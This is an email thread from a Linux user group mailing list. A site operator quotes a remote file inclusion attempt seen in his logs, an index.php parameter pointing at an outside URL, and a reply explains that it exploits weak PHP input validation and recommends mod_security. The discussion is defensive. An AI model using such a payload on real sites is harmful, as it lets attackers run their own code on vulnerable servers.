That is a fairly common tactic.&nbsp; <br>It exploits poor input validation and register globals in PHP.<br>Do yourself a huge favor and install mod_security (I assume you&#39;re using apache?)<br>as an extra measure of security if you haven&#39;t already.<br>
<br><br><div class="gmail_quote">On Wed, Dec 3, 2008 at 3:39 PM, keith smith <span dir="ltr">&lt;<a href="mailto:klsmith2020@yahoo.com">klsmith2020@yahoo.com</a>&gt;</span> wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td style="font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; font-size: inherit; line-height: inherit; font-size-adjust: inherit; font-stretch: inherit;" valign="top">
<br>Hi,<br><br>I am working on a website that gets a lot of exploit attempts.<br><br>They mostly look like this:&nbsp; /index.php?display=<a href="http://humano.ya.com/mysons/index.htm" target="_blank">http://humano.ya.com/mysons/index.htm</a>?<br>
<br>Our code is set to disregard any value that is not expected.&nbsp; <br><br>I&#39;m wondering if there is a clearing house for reporting this type of stuff.&nbsp; I have the IP address as reported.... if that is accurate.<br><br>
Thanks in advance!<br><br>Keith<br><br><span style="font-weight: bold;"><br></span></td></tr></tbody></table><br>



      <br>---------------------------------------------------<br>
PLUG-discuss mailing list - <a href="mailto:PLUG-discuss@lists.plug.phoenix.az.us">PLUG-discuss@lists.plug.phoenix.az.us</a><br>
To subscribe, unsubscribe, or to change your mail settings:<br>
<a href="http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss" target="_blank">http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss</a><br></blockquote></div><br>